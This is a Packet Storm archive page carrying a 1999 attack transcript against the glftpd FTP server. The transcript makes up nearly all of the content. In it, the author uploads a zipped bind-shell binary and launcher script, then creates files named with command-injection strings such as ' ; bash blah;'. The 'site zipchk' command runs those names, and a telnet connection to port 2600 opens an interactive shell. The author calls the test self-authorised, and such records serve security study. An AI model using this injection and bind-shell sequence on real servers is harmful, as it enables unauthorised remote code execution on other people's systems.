exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

003_wp.txt

003_wp.txt
Posted Dec 24, 1999
Authored by Suid | Site suid.kg

Example attack transcript against glftpd. This attack was performed against a default install with a single user account added.

SHA-256 | 70d7d889b43a2d66d151613a1294339e52ec80d676fc66dba686150ebe3bc64f

003_wp.txt

Change Mirror Download
suid@suid.kg. 

This attack was performed against a default install of glftpd with a single user account added.
This attack was authorised (by me against me)

$ ftp
ftp> open ftp.target.com
Connected to 10.0.0.1.
220 GO AWAY
Name (ftp.target.com:suid): suid
331 Password required for suid.
Password:
230 User suid logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd Request
250- --NEWS--
250-
250- New Feature: Login with (!)Username to kill ghost connections.
250-
250-
250- --=- Type SITE HELP for a list of special SITE commands -=--
250-
250-
250- ._____________________________________________________________________
250- | _ / _ / _ / _ / _____/____ ____/ ____/
250- | /_____/ /____/ / / /____/_____ / / / /____ /
250- |____| ._______ /____ /_______ /_______/ /__/ /_______/
250- .-=-------------------- /____/ ---------------------------------------=-.
250- `-=-------------------------------------------------------------------=-'
250- `-----( Type 'site request title' to make a request )-----'
250- .-===================================================================-.
250- | Directory and Race Info for ./Request |
250- |-===================================================================-|
250- | Uploader | Number of Files | Total Size (Bytes) | % of Upload |
250- |-===================================================================-|
250- | 1.glftpd | 5 | 1,189,325 | 100.0% |
250- |______________|_________________|____________________|_______________|
250- | Total : 01 | 5 | 1,189,325 | 100.0% |
250- `-===================================================================-'
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 0
226 [Ul:0.0MB][Dl:0.0MB][Credits:14.6MB][Speed:0.00K/s][Free:2914MB]
ftp> ^Z
[1]+ Stopped ftp
$ gcc ~/bindshell.c -o b -static
$ cat > blah
#!/bin/bash
./b &
^D
$ chmod a+rx b blah
$ zip blah.zip b blah
adding: b (deflated 70%)
adding: blah (stored 0%)
$ > " ; unzip blah.zip;"
$ > " ; bash blah;"
$ fg
ftp (wd: ~)
ftp> put blah.zip
local: blah.zip remote: blah.zip
200 PORT command successful.
150 Opening BINARY mode data connection for blah.zip.
226- Checking file integrity...
226- PASSED. Extracting FILE_ID.DIZ...
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:2770.37K/s][Free:2914MB]
274946 bytes sent in 0.0801 secs (3.4e+03 Kbytes/sec)
ftp> put " ; bash blah;"
local: ; bash blah; remote: ; bash blah;
200 PORT command successful.
150 Opening BINARY mode data connection for ; bash blah;.
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:0.00K/s][Free:2914MB]
ftp> put " ; unzip blah.zip;"
local: ; unzip blah.zip; remote: ; unzip blah.zip;
200 PORT command successful.
150 Opening BINARY mode data connection for ; unzip blah.zip;.
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:0.00K/s][Free:2914MB]
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 542
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:04 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 _;_bash_blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 _;_unzip_blah.zip;
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:51.94K/s][Free:2914MB]
ftp> rename "_;_unzip_blah.zip;" " ; unzip blah.zip;"
350 File exists, ready for destination name
250 RNTO command successful.
ftp> rename "_;_bash_blah;" " ; bash blah;"
350 File exists, ready for destination name
250 RNTO command successful.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 542
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:54.32K/s][Free:2914MB]
ftp> quote site zipchk " ; unzip blah.zip;"
unzip: can't find /site/Request/, /site/Request/.zip or /site/Request/.ZIP, so there.
ftp> ls
Archive: blah.zip
ftp> ls
inflating: b
ftp> ls
extracting: blah
ftp> ls
200- File ; unzip blah.zip; FAILED zipcheck.
200-
200 Command successful.
200 PORT command successful.
ftp> ls -la
200 PORT command successful.
200 PORT command successful.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 2329
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b
-rwxr-xr-x 1 suid NoGroup 18 Dec 23 00:02 blah
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:46.36K/s][Free:2914MB]
ftp> quote site zipchk " ; bash blah;"
200 PORT command successful.
ftp> ls
150 Opening ASCII mode data connection for directory listing.
ftp> ls
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:74.83K/s][Free:2914MB]
200 PORT command successful.
ftp> ls
150 Opening ASCII mode data connection for directory listing.
ftp> ls
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:71.87K/s][Free:2914MB]
unzip: can't find /site/Request/, /site/Request/.zip or /site/Request/.ZIP, so there.
ftp> ls
200- File ; bash blah; FAILED zipcheck.
200-
200 Command successful.
200 PORT command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 2325
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b
-rwxr-xr-x 1 suid NoGroup 18 Dec 23 00:02 blah
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:52.23K/s][Free:2914MB]
ftp> ^Z
[1]+ Stopped ftp (wd: ~)
$ telnet ftp.target.com 2600
Trying 10.0.0.1...
Connected to ftp.target.com.
Escape character is '^]'.
/bin/bash -i;
[suidl@ftp ~]$ ls -la
total 1173
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b
-rwxr-xr-x 1 suid NoGroup 18 Dec 23 00:02 blah
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
[suid@ftp ~]$
[suid@ftp ~]$ exit
....


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close